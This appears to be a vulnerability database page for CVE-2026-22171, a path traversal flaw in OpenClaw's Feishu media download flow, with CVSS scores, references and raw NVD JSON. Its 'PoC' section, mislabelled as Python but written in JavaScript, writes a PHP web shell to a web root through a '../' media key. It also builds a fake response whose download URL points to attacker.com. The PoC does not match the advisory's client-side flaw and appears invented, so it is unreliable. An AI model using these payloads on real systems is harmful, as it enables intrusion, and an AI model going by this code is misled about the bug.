CVE-2026-22171

Description

OpenClaw versions prior to 2026.2.19 contain a path traversal vulnerability in the Feishu media download flow where untrusted media keys are interpolated directly into temporary file paths in extensions/feishu/src/media.ts. An attacker who can control Feishu media key values returned to the client can use traversal segments to escape os.tmpdir() and write arbitrary files within the OpenClaw process permissions.

CVSS Details

CVSS Score

8.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE

OpenClaw < 2026.2.19

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2026-22171 Path Traversal PoC
// Target: OpenClaw Feishu Media Download
// This PoC demonstrates how an attacker can inject path traversal sequences
// into the media key to write arbitrary files on the server

const http = require('http');

// Attacker's controlled media key with path traversal
const maliciousMediaKey = '../../../../../../var/www/html/shell.php';
const maliciousContent = '<?php system($_GET["cmd"]); ?>';

// Construct the exploit request
const exploitData = JSON.stringify({
    media_key: maliciousMediaKey,
    content: maliciousContent,
    file_type: 'php'
});

const options = {
    hostname: 'target-server.com',
    port: 3000,
    path: '/api/feishu/media/download',
    method: 'POST',
    headers: {
        'Content-Type': 'application/json',
        'Content-Length': Buffer.byteLength(exploitData)
    }
};

const req = http.request(options, (res) => {
    let data = '';
    res.on('data', (chunk) => { data += chunk; });
    res.on('end', () => {
        console.log('Response:', data);
        console.log('Path traversal payload sent');
        console.log('If successful, shell.php should be written to /var/www/html/');
    });
});

req.write(exploitData);
req.end();

// Alternative: Intercept and modify Feishu API response
// In a real attack, the attacker would control the media key returned
// from the Feishu API to the OpenClaw client, triggering the file write
function createMaliciousFeishuResponse() {
    return {
        code: 0,
        msg: 'success',
        data: {
            media_key: '../../webroot/backdoor.js',
            download_url: 'http://attacker.com/malicious-file',
            file_name: 'exploit.js'
        }
    };
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22171
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22171
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22171/
[4] VulDB https://vuldb.com/cve/CVE-2026-22171
[5] https://github.com/openclaw/openclaw/commit/c821099157a9767d4df208c6b12f214946507871
[6] https://github.com/openclaw/openclaw/commit/cdb00fe2428000e7a08f9b7848784a0049176705
[7] https://github.com/openclaw/openclaw/commit/ec232a9e2dff60f0e3d7e827a7c868db5254473f
[8] https://github.com/openclaw/openclaw/security/advisories/GHSA-vj3g-5px3-gr46
[9] https://www.vulncheck.com/advisories/openclaw-path-traversal-in-feishu-media-temporary-file-naming

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22171", "sourceIdentifier": "[email protected]", "published": "2026-03-18T02:16:21.310", "lastModified": "2026-03-19T14:52:49.680", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions prior to 2026.2.19 contain a path traversal vulnerability in the Feishu media download flow where untrusted media keys are interpolated directly into temporary file paths in extensions/feishu/src/media.ts. An attacker who can control Feishu media key values returned to the client can use traversal segments to escape os.tmpdir() and write arbitrary files within the OpenClaw process permissions."}, {"lang": "es", "value": "Las versiones de OpenClaw anteriores a 2026.2.19 contienen una vulnerabilidad de salto de ruta en el flujo de descarga de medios de Feishu donde las claves de medios no confiables se interpolan directamente en las rutas de archivos temporales en extensions/feishu/src/media.ts. Un atacante que puede controlar los valores de las claves de medios de Feishu devueltos al cliente puede usar segmentos de salto para escapar de os.tmpdir() y escribir archivos arbitrarios dentro de los permisos del proceso de OpenClaw."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.2.19", "matchCriteriaId": "539A1AE2-E6EC-4FC0-A794-28AA37D76D8E"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/c821099157a9767d4df208c6b12f214946507871", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/commit/cdb00fe2428000e7a08f9b7848784a0049176705", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/commit/ec232a9e2dff60f0e3d7e827a7c868db5254473f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vj3g-5px3-gr46", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-path-traversal-in-feishu-media-temporary-file-naming", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}